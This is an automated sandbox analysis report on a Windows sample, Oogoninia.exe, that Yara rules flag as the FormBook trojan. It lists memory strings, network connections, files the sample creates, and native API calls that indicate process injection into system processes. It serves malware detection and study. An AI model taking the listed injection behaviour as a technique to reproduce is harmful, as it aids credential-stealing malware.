        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAY97Jf.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAaeOki.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C3A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyPU
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img
        Source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: explorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830063439.0000000009E31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comO
        Source: explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000F.00000002.5996841586.0000000011914000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2838101876.0000000011914000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com64.exe
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.glamour.com/story/shag-haircut-photos-products
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.instyle.com/hair/shag-haircut-face-shape
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonella
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1p
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/johnny-gaudreau-s-wife-reveals-in-eulogy-she-s-pregnant-expecti
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 142.250.80.78:443 -> 192.168.11.20:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.20:49706 version: TLS 1.2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F7

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325634E0 NtCreateMutant,LdrInitializeThunk,2_2_325634E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_32562BC0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32562B90
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_32562EB0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_32562D10
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32564260 NtSetContextThread,2_2_32564260
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32564570 NtSuspendThread,2_2_32564570
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562A10 NtWriteFile,2_2_32562A10
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562AC0 NtEnumerateValueKey,2_2_32562AC0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562A80 NtClose,2_2_32562A80
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562AA0 NtQueryInformationFile,2_2_32562AA0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562B10 NtAllocateVirtualMemory,2_2_32562B10
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562B00 NtQueryValueKey,2_2_32562B00
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562B20 NtQueryInformationProcess,2_2_32562B20
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562BE0 NtQueryVirtualMemory,2_2_32562BE0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562B80 NtCreateKey,2_2_32562B80
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325638D0 NtGetContextThread,2_2_325638D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325629D0 NtWaitForSingleObject,2_2_325629D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325629F0 NtReadFile,2_2_325629F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562E50 NtCreateSection,2_2_32562E50
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562E00 NtQueueApcThread,2_2_32562E00
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562ED0 NtResumeThread,2_2_32562ED0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562EC0 NtQuerySection,2_2_32562EC0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562E80 NtCreateProcessEx,2_2_32562E80
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562F00 NtCreateFile,2_2_32562F00
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562F30 NtOpenDirectoryObject,2_2_32562F30
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562FB0 NtSetValueKey,2_2_32562FB0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562C50 NtUnmapViewOfSection,2_2_32562C50
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562C10 NtOpenProcess,2_2_32562C10
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32563C30 NtOpenProcessToken,2_2_32563C30
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562C30 NtMapViewOfSection,2_2_32562C30
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562C20 NtSetInformationFile,2_2_32562C20
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562CD0 NtEnumerateKey,2_2_32562CD0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562CF0 NtDelayExecution,2_2_32562CF0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32563C90 NtOpenThread,2_2_32563C90
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562D50 NtWriteVirtualMemory,2_2_32562D50
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411B88D SleepEx,NtResumeThread,4_2_0411B88D
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411B670 SleepEx,NtCreateSection,4_2_0411B670
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA34E0 NtCreateMutant,LdrInitializeThunk,9_2_04CA34E0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2CF0 NtDelayExecution,LdrInitializeThunk,9_2_04CA2CF0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2C30 NtMapViewOfSection,LdrInitializeThunk,9_2_04CA2C30
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2D10 NtQuerySystemInformation,LdrInitializeThunk,9_2_04CA2D10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2E50 NtCreateSection,LdrInitializeThunk,9_2_04CA2E50
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2F00 NtCreateFile,LdrInitializeThunk,9_2_04CA2F00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA29F0 NtReadFile,LdrInitializeThunk,9_2_04CA29F0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2A80 NtClose,LdrInitializeThunk,9_2_04CA2A80
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2BC0 NtQueryInformationToken,LdrInitializeThunk,9_2_04CA2BC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2B80 NtCreateKey,LdrInitializeThunk,9_2_04CA2B80
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2B90 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04CA2B90
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2B00 NtQueryValueKey,LdrInitializeThunk,9_2_04CA2B00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2B10 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04CA2B10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA4570 NtSuspendThread,9_2_04CA4570
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA4260 NtSetContextThread,9_2_04CA4260
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2CD0 NtEnumerateKey,9_2_04CA2CD0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA3C90 NtOpenThread,9_2_04CA3C90
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2C50 NtUnmapViewOfSection,9_2_04CA2C50
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2C10 NtOpenProcess,9_2_04CA2C10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2C20 NtSetInformationFile,9_2_04CA2C20
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA3C30 NtOpenProcessToken,9_2_04CA3C30
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2DC0 NtAdjustPrivilegesToken,9_2_04CA2DC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2DA0 NtReadVirtualMemory,9_2_04CA2DA0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2D50 NtWriteVirtualMemory,9_2_04CA2D50
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2EC0 NtQuerySection,9_2_04CA2EC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2ED0 NtResumeThread,9_2_04CA2ED0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2E80 NtCreateProcessEx,9_2_04CA2E80
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2EB0 NtProtectVirtualMemory,9_2_04CA2EB0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2E00 NtQueueApcThread,9_2_04CA2E00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2FB0 NtSetValueKey,9_2_04CA2FB0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2F30 NtOpenDirectoryObject,9_2_04CA2F30
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA38D0 NtGetContextThread,9_2_04CA38D0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA29D0 NtWaitForSingleObject,9_2_04CA29D0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2AC0 NtEnumerateValueKey,9_2_04CA2AC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2AA0 NtQueryInformationFile,9_2_04CA2AA0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2A10 NtWriteFile,9_2_04CA2A10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2BE0 NtQueryVirtualMemory,9_2_04CA2BE0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CA2B20 NtQueryInformationProcess,9_2_04CA2B20
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2EFFE NtQueryInformationProcess,9_2_04B2EFFE
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B33568 NtSetContextThread,9_2_04B33568
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B33EC8 NtQueueApcThread,9_2_04B33EC8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B33888 NtSuspendThread,9_2_04B33888
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B33BA8 NtResumeThread,9_2_04B33BA8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Windows\Fonts\prelegacyJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Windows\Fonts\prelegacy\prsterJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004049360_2_00404936
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_324F22452_2_324F2245
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C2_2_325E124C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D2102_2_3254D210
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D2EC2_2_3251D2EC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253E3102_2_3253E310
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EF3302_2_325EF330
